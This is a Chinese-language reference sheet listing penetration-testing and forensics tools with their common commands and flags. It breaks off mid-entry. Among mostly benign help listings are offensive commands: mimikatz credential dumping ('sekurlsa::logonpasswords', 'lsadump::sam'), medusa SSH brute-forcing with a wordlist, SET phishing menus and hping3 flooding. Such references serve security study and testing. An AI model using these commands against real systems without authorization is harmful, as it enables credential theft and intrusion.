常用命令
bash
searchsploit wordpress plugin
searchsploit vsftpd 2.3.4常用参数
bash
通常通过 searchsploit 使用 # 本地离线检索Exploit-DBSET社工工具包
所属分类:利用 / 社工
常用命令
bash
setoolkit常用参数
bash
1) Social-Engineering Attacks # 主菜单中常用功能
2) Website Attack Vectors # 钓鱼站点
3) Infectious Media Generator # 介质投递shellnoob Shellcode辅助
所属分类:利用
常用命令
bash
shellnoob --from-asm shell.asm --to-bin
shellnoob --from-bin shell.bin --to-python常用参数
bash
--from-asm/--to-bin # 格式转换
--from-bin/--to-python # 转Python表示termineter 智能电表测试
所属分类:利用
常用命令
bash
termineter -h
termineter常用参数
bash
智能电表安全测试工具 # 按模块使用7zip取证工具常用命令
所属分类:取证
常用命令
bash
7zip --help常用参数
bash
--help # 查看帮助
man tool # 查看手册afflib-tools取证工具常用命令
所属分类:取证
常用命令
bash
afflib-tools --help常用参数
bash
--help # 查看帮助
man tool # 查看手册apktool安卓拆包与重打包
所属分类:取证 / 逆向
常用命令
bash
apktool d app.apk -o out
apktool b out -o repack.apk常用参数
bash
d # 反编译
b # 重打包
if framework-res.apk # 安装framework资源
-o out # 输出目录/文件
-f # 强制覆盖
-r # 不反编译资源
-s # 不反编译源码
--use-aapt2 # 使用aapt2Autopsy图形化取证
所属分类:取证
常用命令
bash
autopsy常用参数
bash
Web取证平台 # 浏览器访问界面binwalk固件分析
所属分类:取证 / 硬件
常用命令
bash
binwalk firmware.bin
binwalk -e firmware.bin常用参数
bash
-e # 提取识别到的内容
-M # 递归分析
-B # 扫描签名
-E # 熵分析
-R 'gzip' # 查找指定签名
-y filesystem # 只扫某类签名
--dd='.*' # 按匹配结果提取
-v # 详细输出binwalk3固件分析
所属分类:取证 / 硬件
常用命令
bash
binwalk3 firmware.bin
binwalk3 extract firmware.bin常用参数
bash
extract # 提取内容bulk-extractor取证工具常用命令
所属分类:取证
常用命令
bash
bulk-extractor --help常用参数
bash
--help # 查看帮助
man tool # 查看手册bytecode-viewer取证工具常用命令
所属分类:取证 / 逆向
常用命令
bash
bytecode-viewer --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cabextract取证工具常用命令
所属分类:取证
常用命令
bash
cabextract --help常用参数
bash
--help # 查看帮助
man tool # 查看手册chkrootkit取证工具常用命令
所属分类:取证
常用命令
bash
chkrootkit --help常用参数
bash
--help # 查看帮助
man tool # 查看手册creddump7取证工具常用命令
所属分类:取证 / 密码攻击
常用命令
bash
creddump7 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dc3dd取证工具常用命令
所属分类:取证
常用命令
bash
dc3dd --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dcfldd取证工具常用命令
所属分类:取证
常用命令
bash
dcfldd --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ddrescue取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
ddrescue --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dumpzilla取证工具常用命令
所属分类:取证
常用命令
bash
dumpzilla --help常用参数
bash
--help # 查看帮助
man tool # 查看手册edb-debugger取证工具常用命令
所属分类:取证 / 逆向
常用命令
bash
edb-debugger --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ewf-tools取证工具常用命令
所属分类:取证 / 应急响应
常用命令
bash
ewf-tools --help常用参数
bash
--help # 查看帮助
man tool # 查看手册exifprobe取证工具常用命令
所属分类:取证
常用命令
bash
exifprobe --help常用参数
bash
--help # 查看帮助
man tool # 查看手册exiv2取证工具常用命令
所属分类:取证
常用命令
bash
exiv2 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ext3grep取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
ext3grep --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ext4magic取证工具常用命令
所属分类:取证
常用命令
bash
ext4magic --help常用参数
bash
--help # 查看帮助
man tool # 查看手册extundelete取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
extundelete --help常用参数
bash
--help # 查看帮助
man tool # 查看手册fcrackzip取证工具常用命令
所属分类:取证 / 密码攻击
常用命令
bash
fcrackzip --help常用参数
bash
--help # 查看帮助
man tool # 查看手册firmware-mod-kit资源包与常用路径
所属分类:取证
常用命令
bash
ls /usr/share/firmware-mod-kit
find /usr/share/firmware-mod-kit -type f | head常用参数
bash
/usr/share/firmware-mod-kit # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令foremost文件雕刻
所属分类:取证
常用命令
bash
foremost -i disk.img -o out
foremost -t jpg,png -i dump.bin -o out常用参数
bash
-i file # 输入文件
-o out # 输出目录
-t jpg,png,pdf # 指定文件类型
-c foremost.conf # 指定配置文件
-q # 安静模式
-v # 详细输出
-T # 按时间戳排序forensic-artifacts资源包与常用路径
所属分类:取证
常用命令
bash
ls /usr/share/forensic-artifacts
find /usr/share/forensic-artifacts -type f | head常用参数
bash
/usr/share/forensic-artifacts # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令forensics-colorize资源包与常用路径
所属分类:取证
常用命令
bash
ls /usr/share/forensics-colorize
find /usr/share/forensics-colorize -type f | head常用参数
bash
/usr/share/forensics-colorize # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令galleta取证工具常用命令
所属分类:取证
常用命令
bash
galleta --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gdb调试
所属分类:取证 / CTF常用补充
常用命令
bash
gdb -q ./a.out
gdb -q -p 1234
gdb -q ./a.out -ex 'set disassembly-flavor intel'常用参数
bash
b *main # 下断点
r # 运行
c # 继续
ni / si # 单步步过/步入
finish # 运行到当前函数返回
info registers # 查看寄存器
x/20gx $rsp # 查看内存
disas main # 反汇编函数
set disassembly-flavor intel # Intel语法
attach 1234 # 附加进程gpart取证工具常用命令
所属分类:取证
常用命令
bash
gpart --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gparted取证工具常用命令
所属分类:取证
常用命令
bash
gparted --help常用参数
bash
--help # 查看帮助
man tool # 查看手册grokevt取证工具常用命令
所属分类:取证
常用命令
bash
grokevt --help常用参数
bash
--help # 查看帮助
man tool # 查看手册guymager图形化工具
所属分类:取证 / 应急响应
常用命令
bash
guymager常用参数
bash
--help # 查看帮助
图形/交互式工具 # 以启动后菜单/界面为主hashdeep取证工具常用命令
所属分类:取证
常用命令
bash
hashdeep --help常用参数
bash
--help # 查看帮助
man tool # 查看手册inetsim取证工具常用命令
所属分类:取证
常用命令
bash
inetsim --help常用参数
bash
--help # 查看帮助
man tool # 查看手册jadx安卓反编译
所属分类:取证 / 逆向
常用命令
bash
jadx-gui app.apk
jadx -d out app.apk常用参数
bash
-d out # 输出目录
jadx-gui # 图形界面javasnoop取证工具常用命令
所属分类:取证 / 逆向
常用命令
bash
javasnoop --help常用参数
bash
--help # 查看帮助
man tool # 查看手册libhivex-bin资源包与常用路径
所属分类:取证
常用命令
bash
ls /usr/bin
find /usr/bin -type f | head常用参数
bash
/usr/bin # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令libsmali-java资源包与常用路径
所属分类:取证
常用命令
bash
ls /usr/share/java
find /usr/share/java -type f | head常用参数
bash
/usr/share/java # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令lvm2取证工具常用命令
所属分类:取证
常用命令
bash
lvm2 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册lynis系统安全审计
所属分类:取证 / 漏洞分析
常用命令
bash
lynis audit system
lynis show commands常用参数
bash
audit system # 审计系统
show commands # 查看命令mac-robber取证工具常用命令
所属分类:取证
常用命令
bash
mac-robber --help常用参数
bash
--help # 查看帮助
man tool # 查看手册magicrescue取证工具常用命令
所属分类:取证
常用命令
bash
magicrescue --help常用参数
bash
--help # 查看帮助
man tool # 查看手册md5deep取证工具常用命令
所属分类:取证
常用命令
bash
md5deep --help常用参数
bash
--help # 查看帮助
man tool # 查看手册memdump取证工具常用命令
所属分类:取证
常用命令
bash
memdump --help常用参数
bash
--help # 查看帮助
man tool # 查看手册metacam取证工具常用命令
所属分类:取证
常用命令
bash
metacam --help常用参数
bash
--help # 查看帮助
man tool # 查看手册missidentify取证工具常用命令
所属分类:取证
常用命令
bash
missidentify --help常用参数
bash
--help # 查看帮助
man tool # 查看手册myrescue取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
myrescue --help常用参数
bash
--help # 查看帮助
man tool # 查看手册nasm取证工具常用命令
所属分类:取证
常用命令
bash
nasm --help常用参数
bash
--help # 查看帮助
man tool # 查看手册nasty取证工具常用命令
所属分类:取证
常用命令
bash
nasty --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ollydbg取证工具常用命令
所属分类:取证 / 逆向 / Windows资源
常用命令
bash
ollydbg --help常用参数
bash
--help # 查看帮助
man tool # 查看手册parted取证工具常用命令
所属分类:取证
常用命令
bash
parted --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pasco取证工具常用命令
所属分类:取证
常用命令
bash
pasco --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pdf-parserPDF结构分析
所属分类:取证
常用命令
bash
pdf-parser.py sample.pdf
pdf-parser.py --search javascript sample.pdf常用参数
bash
--object 5 # 查看指定对象
--search str # 搜索对象pdfidPDF可疑特征检查
所属分类:取证
常用命令
bash
pdfid.py sample.pdf
pdfid.py -n sample.pdf常用参数
bash
-n # 不显示计数为0的项目plaso取证工具常用命令
所属分类:取证
常用命令
bash
plaso --help常用参数
bash
--help # 查看帮助
man tool # 查看手册polenum取证工具常用命令
所属分类:取证 / 密码攻击
常用命令
bash
polenum --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pst-utils取证工具常用命令
所属分类:取证
常用命令
bash
pst-utils --help常用参数
bash
--help # 查看帮助
man tool # 查看手册python3-capstone资源包与常用路径
所属分类:取证
常用命令
bash
ls python3
find python3 -type f | head常用参数
bash
python3 # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令python3-dfdatetime资源包与常用路径
所属分类:取证
常用命令
bash
ls python3
find python3 -type f | head常用参数
bash
python3 # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令python3-dfvfs资源包与常用路径
所属分类:取证
常用命令
bash
ls python3
find python3 -type f | head常用参数
bash
python3 # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令python3-dfwinreg资源包与常用路径
所属分类:取证
常用命令
bash
ls python3
find python3 -type f | head常用参数
bash
python3 # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令python3-distorm3资源包与常用路径
所属分类:取证
常用命令
bash
ls python3
find python3 -type f | head常用参数
bash
python3 # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令radare2逆向分析
所属分类:取证 / 硬件 / 逆向 / CTF常用补充
常用命令
bash
r2 -A ./a.out
rabin2 -I ./a.out常用参数
bash
-A # 自动分析
aaa # 深度分析
afl # 函数列表
pdf @ sym.main # 反汇编函数
px 64 @ rsp # 查看内存
iz # 查看字符串
ii / iI # 导入/文件信息
VV # 图形化视图
/db main # 下断点
dc # 继续运行readpe取证工具常用命令
所属分类:取证
常用命令
bash
readpe --help常用参数
bash
--help # 查看帮助
man tool # 查看手册recoverdm取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
recoverdm --help常用参数
bash
--help # 查看帮助
man tool # 查看手册recoverjpeg取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
recoverjpeg --help常用参数
bash
--help # 查看帮助
man tool # 查看手册reglookup取证工具常用命令
所属分类:取证
常用命令
bash
reglookup --help常用参数
bash
--help # 查看帮助
man tool # 查看手册regripper取证工具常用命令
所属分类:取证 / Windows资源
常用命令
bash
regripper --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rephrase取证工具常用命令
所属分类:取证
常用命令
bash
rephrase --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rifiuti取证工具常用命令
所属分类:取证
常用命令
bash
rifiuti --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rifiuti2取证工具常用命令
所属分类:取证
常用命令
bash
rifiuti2 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册Cutter图形化逆向分析
所属分类:取证 / 硬件 / 逆向
常用命令
bash
cutter
rizin-cutter常用参数
bash
图形界面工具 # 基于Rizin的GUI逆向工具rkhunter取证工具常用命令
所属分类:取证
常用命令
bash
rkhunter --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rsakeyfind取证工具常用命令
所属分类:取证
常用命令
bash
rsakeyfind --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rz-ghidra取证工具常用命令
所属分类:取证 / 硬件 / 逆向
常用命令
bash
rz-ghidra --help常用参数
bash
--help # 查看帮助
man tool # 查看手册safecopy取证工具常用命令
所属分类:取证
常用命令
bash
safecopy --help常用参数
bash
--help # 查看帮助
man tool # 查看手册samdump2取证工具常用命令
所属分类:取证 / 密码攻击
常用命令
bash
samdump2 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册scalpel文件雕刻
所属分类:取证
常用命令
bash
scalpel dump.bin -o out
scalpel -c /etc/scalpel/scalpel.conf dump.bin -o out常用参数
bash
-c conf # 配置文件
-o out # 输出目录scrounge-ntfs取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
scrounge-ntfs --help常用参数
bash
--help # 查看帮助
man tool # 查看手册Sleuth Kit磁盘取证
所属分类:取证
常用命令
bash
fls -r -m / disk.img
icat disk.img 5 > file.bin常用参数
bash
fls # 列文件
icat # 导出文件
mmls # 分区信息ssdeep取证工具常用命令
所属分类:取证
常用命令
bash
ssdeep --help常用参数
bash
--help # 查看帮助
man tool # 查看手册tcpflow取证工具常用命令
所属分类:取证 / 嗅探欺骗
常用命令
bash
tcpflow --help常用参数
bash
--help # 查看帮助
man tool # 查看手册tcpick取证工具常用命令
所属分类:取证
常用命令
bash
tcpick --help常用参数
bash
--help # 查看帮助
man tool # 查看手册tcpreplay取证工具常用命令
所属分类:取证 / 嗅探欺骗
常用命令
bash
tcpreplay --help常用参数
bash
--help # 查看帮助
man tool # 查看手册truecrack取证工具常用命令
所属分类:取证 / GPU / 密码攻击
常用命令
bash
truecrack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册undbx取证工具常用命令
所属分类:取证 / 恢复
常用命令
bash
undbx --help常用参数
bash
--help # 查看帮助
man tool # 查看手册unhide取证工具常用命令
所属分类:取证
常用命令
bash
unhide --help常用参数
bash
--help # 查看帮助
man tool # 查看手册unrar取证工具常用命令
所属分类:取证
常用命令
bash
unrar --help常用参数
bash
--help # 查看帮助
man tool # 查看手册upx-ucl取证工具常用命令
所属分类:取证
常用命令
bash
upx-ucl --help常用参数
bash
--help # 查看帮助
man tool # 查看手册vinetto取证工具常用命令
所属分类:取证
常用命令
bash
vinetto --help常用参数
bash
--help # 查看帮助
man tool # 查看手册wce资源包与常用路径
所属分类:取证 / Windows资源
常用命令
bash
ls /usr/share/windows-resources
find /usr/share/windows-resources -type f | head常用参数
bash
/usr/share/windows-resources # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令winregfs取证工具常用命令
所属分类:取证
常用命令
bash
winregfs --help常用参数
bash
--help # 查看帮助
man tool # 查看手册xmount镜像挂载
所属分类:取证
常用命令
bash
xmount --in ewf image.E01 /mnt/ewf
xmount --in raw disk.img /mnt/raw常用参数
bash
--in ewf|raw # 输入类型xplico取证工具常用命令
所属分类:取证
常用命令
bash
xplico --help常用参数
bash
--help # 查看帮助
man tool # 查看手册YARA规则扫描
所属分类:取证
常用命令
bash
yara rule.yar sample.bin
yara -r rules/ samples/常用参数
bash
-r # 递归扫描
-s # 输出匹配字符串AFL++二进制模糊测试
所属分类:模糊测试 / 漏洞分析
常用命令
bash
afl-fuzz -i in -o out -- ./target @@
afl-showmap -o map.txt -- ./target @@常用参数
bash
-i in # 输入种子目录
@@ # 输入文件占位符
-o out # 输出目录sfuzz简单模糊测试
所属分类:模糊测试 / 漏洞分析
常用命令
bash
sfuzz -h
sfuzz常用参数
bash
按帮助定义目标与payload # 简易fuzzerspike协议模糊测试
所属分类:模糊测试 / 漏洞分析
常用命令
bash
generic_send_tcp 192.168.56.106 80 script.spk 0 0常用参数
bash
generic_send_tcp host port script 0 0 # 发送测试脚本oclgausscrackGPU工具常用命令
所属分类:GPU
常用命令
bash
oclgausscrack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cutecom串口调试
所属分类:硬件
常用命令
bash
cutecom常用参数
bash
图形界面串口工具 # 适合硬件串口交互flashrom固件读写
所属分类:硬件
常用命令
bash
flashrom -p internal -r bios.bin
flashrom -p ch341a_spi -w bios.bin常用参数
bash
-p programmer # 编程器
-r bios.bin # 读取
-w bios.bin # 写入minicom串口交互
所属分类:硬件
常用命令
bash
minicom -D /dev/ttyUSB0 -b 115200
minicom -s常用参数
bash
-b 115200 # 波特率
-D /dev/ttyUSB0 # 串口设备
-s # 设置菜单OpenOCD硬件调试
所属分类:硬件
常用命令
bash
openocd -f interface/stlink.cfg -f target/stm32f1x.cfg常用参数
bash
-f config.cfg # 指定配置文件QEMU系统仿真
所属分类:硬件
常用命令
bash
qemu-system-x86_64 -hda disk.img -m 512
qemu-system-x86_64 -kernel bzImage -append 'console=ttyS0' -nographic常用参数
bash
-hda disk.img # 磁盘镜像
-m 512 # 内存
-nographic # 无图形QEMU用户态仿真
所属分类:硬件
常用命令
bash
qemu-aarch64 ./binary
qemu-i386 ./binary常用参数
bash
qemu-aarch64/qemu-i386 # 指定架构amass子域收集与资产枚举
所属分类:识别
常用命令
bash
amass enum -passive -d example.com
amass enum -active -d example.com -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt常用参数
bash
-d example.com # 目标域名
-passive # 被动收集
-w wordlist.txt # 字典
-active # 主动收集
-brute # 爆破子域
enum # 枚举模式
-o result.txt # 输出文件assetfinder子域发现
所属分类:识别
常用命令
bash
assetfinder example.com
assetfinder --subs-only example.com常用参数
bash
--subs-only # 仅输出子域cisco-auditing-tool识别工具常用命令
所属分类:识别 / 密码攻击 / 漏洞分析
常用命令
bash
cisco-auditing-tool --help常用参数
bash
--help # 查看帮助
man tool # 查看手册DefectDojo漏洞管理平台
所属分类:识别
常用命令
bash
docker compose up defectdojo常用参数
bash
Web平台 # 用于漏洞管理与报告归档hb-honeypot识别工具常用命令
所属分类:识别
常用命令
bash
hb-honeypot常用参数
bash
用于蜜罐/识别场景 # 依帮助设置
--help # 查看帮助kali-autopilot自动化枚举
所属分类:识别
常用命令
bash
kali-autopilot常用参数
bash
自动化工作流工具 # 按帮助使用Maltego图形化情报关联
所属分类:识别 / 信息收集 / 报告 / 社工 / Web
常用命令
bash
maltego常用参数
bash
图形界面工具 # OSINT关系图谱分析Maryam开源情报框架
所属分类:识别
常用命令
bash
maryam常用参数
bash
交互式OSINT工具 # 按模块使用Nipper配置审计
所属分类:识别
常用命令
bash
nipper --input=config.txt --output=report.html常用参数
bash
--input file # 配置文件
--output report.html # 报告OSRFramework用户名情报收集
所属分类:识别
常用命令
bash
usufy.py -n targetname
mailfy.py -n targetname常用参数
bash
usufy.py # 用户名查询
mailfy.py # 邮箱模式推测SpiderFoot自动化OSINT
所属分类:识别
常用命令
bash
spiderfoot -l 127.0.0.1:5001
spiderfoot-cli -h常用参数
bash
-l 127.0.0.1:5001 # 启动Web界面tiger识别工具常用命令
所属分类:识别
常用命令
bash
tiger --help常用参数
bash
--help # 查看帮助
man tool # 查看手册wapiti Web漏洞扫描
所属分类:识别 / Web
常用命令
bash
wapiti -u http://192.168.56.106
wapiti -u http://192.168.56.106 -f html -o report常用参数
bash
-u URL # 目标
-f html|json # 报告格式
-o report # 输出路径WitnessMe资产截图
所属分类:识别
常用命令
bash
witnessme 192.168.56.0/24
witnessme -f hosts.txt常用参数
bash
-f hosts.txt # 目标列表zaproxyWeb代理与扫描
所属分类:识别 / Web
常用命令
bash
zaproxy
zap.sh -daemon -port 8090 -config api.disablekey=true常用参数
bash
-config api.disablekey=true # 关闭API key限制
-daemon # 后台模式
-port 8090 # 指定端口0trace信息收集工具常用命令
所属分类:信息收集
常用命令
bash
0trace --help常用参数
bash
--help # 查看帮助
man tool # 查看手册arping信息收集工具常用命令
所属分类:信息收集
常用命令
bash
arping --help常用参数
bash
--help # 查看帮助
man tool # 查看手册braa信息收集工具常用命令
所属分类:信息收集
常用命令
bash
braa --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dmitry信息收集工具常用命令
所属分类:信息收集
常用命令
bash
dmitry --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dnsenum域名枚举
所属分类:信息收集
常用命令
bash
dnsenum example.com
dnsenum --enum example.com常用参数
bash
-f dict.txt # 子域字典
--enum # 启用更多枚举dnsmap信息收集工具常用命令
所属分类:信息收集
常用命令
bash
dnsmap --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dnsrecon DNS枚举
所属分类:信息收集
常用命令
bash
dnsrecon -d example.com
dnsrecon -d example.com -t brt -D subdomains.txt常用参数
bash
-d domain # 域名
-D dict.txt # 字典
-t std|axfr|brt # 模式dnstracer信息收集工具常用命令
所属分类:信息收集
常用命令
bash
dnstracer --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dnswalk信息收集工具常用命令
所属分类:信息收集
常用命令
bash
dnswalk --help常用参数
bash
--help # 查看帮助
man tool # 查看手册fierce子域发现
所属分类:信息收集
常用命令
bash
fierce --domain example.com
fierce --domain example.com --subdomains accounts常用参数
bash
--domain example.com # 目标域
--subdomains xxx # 指定子域词firewalk信息收集工具常用命令
所属分类:信息收集
常用命令
bash
firewalk --help常用参数
bash
--help # 查看帮助
man tool # 查看手册fping主机存活探测
所属分类:信息收集
常用命令
bash
fping -a -g 192.168.56.0/24
fping -f hosts.txt常用参数
bash
-f hosts.txt # 目标列表
-a # 仅显示存活
-g 192.168.56.0/24 # 网段扫描fragrouter信息收集工具常用命令
所属分类:信息收集
常用命令
bash
fragrouter --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ftester信息收集工具常用命令
所属分类:信息收集 / Web
常用命令
bash
ftester --help常用参数
bash
--help # 查看帮助
man tool # 查看手册hping3自定义发包
所属分类:信息收集
常用命令
bash
hping3 -S -p 80 192.168.56.106
hping3 --udp -p 53 192.168.56.106常用参数
bash
-p 80 # 端口
--flood # 洪泛
--udp # UDP模式
-S # SYN包ike-scan VPN探测
所属分类:信息收集
常用命令
bash
ike-scan 192.168.56.106
ike-scan -A 192.168.56.106常用参数
bash
-A # Aggressive模式探测
-M # Main模式intrace信息收集工具常用命令
所属分类:信息收集
常用命令
bash
intrace --help常用参数
bash
--help # 查看帮助
man tool # 查看手册irpas信息收集工具常用命令
所属分类:信息收集
常用命令
bash
irpas --help常用参数
bash
--help # 查看帮助
man tool # 查看手册lbd负载均衡识别
所属分类:信息收集 / Web
常用命令
bash
lbd http://192.168.56.106/
lbd https://example.com/常用参数
bash
直接接URL # 检测负载均衡/多后端legion综合枚举与扫描
所属分类:信息收集 / 漏洞分析
常用命令
bash
legion
python3 /usr/share/legion/legion.py常用参数
bash
图形界面工具 # 集成Nmap/dirb等多工具masscan高速端口扫描
所属分类:信息收集
常用命令
bash
masscan 192.168.56.0/24 -p1-65535 --rate 1000
masscan 192.168.56.106 -p80,443,22 --rate 500常用参数
bash
-p1-65535 # 端口范围
--rate 1000 # 发包速率
--router-ip 192.168.56.1 # 指定网关
-e eth0 # 指定网卡
-oL result.txt # 列表输出metagoofil文档元数据收集
所属分类:信息收集 / 报告
常用命令
bash
metagoofil -d example.com -t pdf,doc,xls -l 20 -n 10 -o out -f results.html
metagoofil -h常用参数
bash
-d example.com # 目标域名
-f report.html # 报告文件
-l 20 # 搜索结果数
-n 10 # 下载文件数
-t pdf,doc,xls # 文件类型
-o out # 下载目录nbtscanNetBIOS枚举
所属分类:信息收集
常用命令
bash
nbtscan 192.168.56.0/24
nbtscan -r 192.168.56.106常用参数
bash
-r # 输出MAC/状态等更多信息netdiscover局域网发现
所属分类:信息收集
常用命令
bash
netdiscover -r 192.168.56.0/24
netdiscover -i eth0常用参数
bash
-i eth0 # 接口
-r CIDR # 网段
-P # 被动模式netmask信息收集工具常用命令
所属分类:信息收集
常用命令
bash
netmask --help常用参数
bash
--help # 查看帮助
man tool # 查看手册p0f信息收集工具常用命令
所属分类:信息收集
常用命令
bash
p0f --help常用参数
bash
--help # 查看帮助
man tool # 查看手册qsslcaudit信息收集工具常用命令
所属分类:信息收集 / Web
常用命令
bash
qsslcaudit --help常用参数
bash
--help # 查看帮助
man tool # 查看手册recon-ng信息收集框架
所属分类:信息收集
常用命令
bash
recon-ng
recon-cli -m marketplace list常用参数
bash
options set SOURCE ... # 设置目标
marketplace search # 搜索模块
modules load ... # 载入模块
run # 运行模块smbmapSMB共享与权限枚举
所属分类:信息收集 / 密码攻击
常用命令
bash
smbmap -H 192.168.56.106
smbmap -H 192.168.56.106 -u user -p pass -R常用参数
bash
-H 192.168.56.106 # 目标主机
-p pass # 密码
-u user # 用户名
--download 'share/file' # 下载文件
--upload local remote # 上传文件
-R # 递归列目录smtp-user-enum邮箱用户枚举
所属分类:信息收集
常用命令
bash
smtp-user-enum -M VRFY -U users.txt -t 192.168.56.106
smtp-user-enum -M RCPT -u root -t 192.168.56.106常用参数
bash
-u root # 单用户
-U users.txt # 用户字典
-M VRFY|EXPN|RCPT # 枚举方式snmpcheck SNMP枚举
所属分类:信息收集
常用命令
bash
snmpcheck -t 192.168.56.106 -c public
snmpcheck -t 192.168.56.106 -c public -v 2c常用参数
bash
-c public # 团体字
-t host # 目标
-v 1|2c|3 # SNMP版本ssldump SSL流量分析
所属分类:信息收集 / Web
常用命令
bash
ssldump -i eth0 host 192.168.56.106
ssldump -r capture.pcap常用参数
bash
-i eth0 # 接口
-r capture.pcap # 读取pcapsslh信息收集工具常用命令
所属分类:信息收集 / 后渗透 / Web
常用命令
bash
sslh --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sslscan SSL/TLS扫描
所属分类:信息收集 / Web
常用命令
bash
sslscan 192.168.56.106:443
sslscan --show-ciphers 192.168.56.106:443常用参数
bash
--no-colour # 关闭颜色
--show-ciphers # 显示支持套件sslyze TLS配置检查
所属分类:信息收集 / Web
常用命令
bash
sslyze 192.168.56.106:443
sslyze --regular 192.168.56.106:443常用参数
bash
--certinfo # 证书信息
--regular # 常规检查swaksSMTP测试
所属分类:信息收集
常用命令
bash
swaks --to test@example.com --from root@example.com --server 192.168.56.106
swaks --to test@example.com --server 192.168.56.106 --auth LOGIN -au user -ap pass常用参数
bash
--auth LOGIN # 认证方式
--server host # SMTP服务器
--to/--from # 收发地址thc-ipv6信息收集工具常用命令
所属分类:信息收集
常用命令
bash
thc-ipv6 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册theHarvester被动信息收集
所属分类:信息收集
常用命令
bash
theHarvester -d example.com -b all
theHarvester -d example.com -b bing -l 200常用参数
bash
-d example.com # 目标域名
-b all|bing|crtsh # 数据源
-l 200 # 结果数量
-f output.html # 输出文件TLSSLed HTTPS配置审计
所属分类:信息收集 / Web
常用命令
bash
TLSSLed 192.168.56.106 443
TLSSLed example.com 443常用参数
bash
host port # 目标主机与端口twofi信息收集工具常用命令
所属分类:信息收集 / 密码攻击
常用命令
bash
twofi --help常用参数
bash
--help # 查看帮助
man tool # 查看手册unicornscan异步端口扫描
所属分类:信息收集
常用命令
bash
unicornscan -mT 192.168.56.106:a
unicornscan -mU 192.168.56.106:53常用参数
bash
-mT # TCP模式
-mU # UDP模式
:a # 全端口urlcrazy域名变体生成
所属分类:信息收集
常用命令
bash
urlcrazy example.com
urlcrazy -r example.com常用参数
bash
-r # 检查DNS解析wafw00fWAF识别
所属分类:信息收集 / Web
常用命令
bash
wafw00f http://192.168.56.106
wafw00f -a http://192.168.56.106常用参数
bash
-a # 额外检测
-o output.txt # 输出到文件
-v # 详细输出chntpw密码工具常用命令
所属分类:密码攻击
常用命令
bash
chntpw --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cmospwd密码工具常用命令
所属分类:密码攻击
常用命令
bash
cmospwd --help常用参数
bash
--help # 查看帮助
man tool # 查看手册freerdp3-x11密码工具常用命令
所属分类:密码攻击
常用命令
bash
freerdp3-x11 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gpp-decrypt组策略口令解密
所属分类:密码攻击
常用命令
bash
gpp-decrypt 'edBSHOwhZLTjt/QS...'
grep -R cpassword .常用参数
bash
直接传cpassword # 输出明文hash-identifier密码工具常用命令
所属分类:密码攻击
常用命令
bash
hash-identifier --help常用参数
bash
--help # 查看帮助
man tool # 查看手册hashid密码工具常用命令
所属分类:密码攻击
常用命令
bash
hashid --help常用参数
bash
--help # 查看帮助
man tool # 查看手册Johnny图形化John前端
所属分类:密码攻击
常用命令
bash
johnny
johnny &常用参数
bash
图形界面工具 # John the Ripper前端maskprocessor密码工具常用命令
所属分类:密码攻击
常用命令
bash
maskprocessor --help常用参数
bash
--help # 查看帮助
man tool # 查看手册medusa口令爆破
所属分类:密码攻击 / Web
常用命令
bash
medusa -h 192.168.56.106 -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P pass.txt -M ftp常用参数
bash
-h host # 单个主机
-H hosts.txt # 主机列表
-p pass / -P pass.txt # 密码
-u user / -U users.txt # 用户
-M ssh|ftp|http # 服务模块
-t 10 # 线程数mimikatz凭据提取
所属分类:密码攻击 / 后渗透 / Windows资源
常用命令
bash
mimikatz
sekurlsa::logonpasswords常用参数
bash
kerberos::list # Kerberos票据
lsadump::sam # 导出SAM
privilege::debug # 提权调试权限
sekurlsa::logonpasswords # 导出明文/哈希ncrack网络服务爆破
所属分类:密码攻击 / Web
常用命令
bash
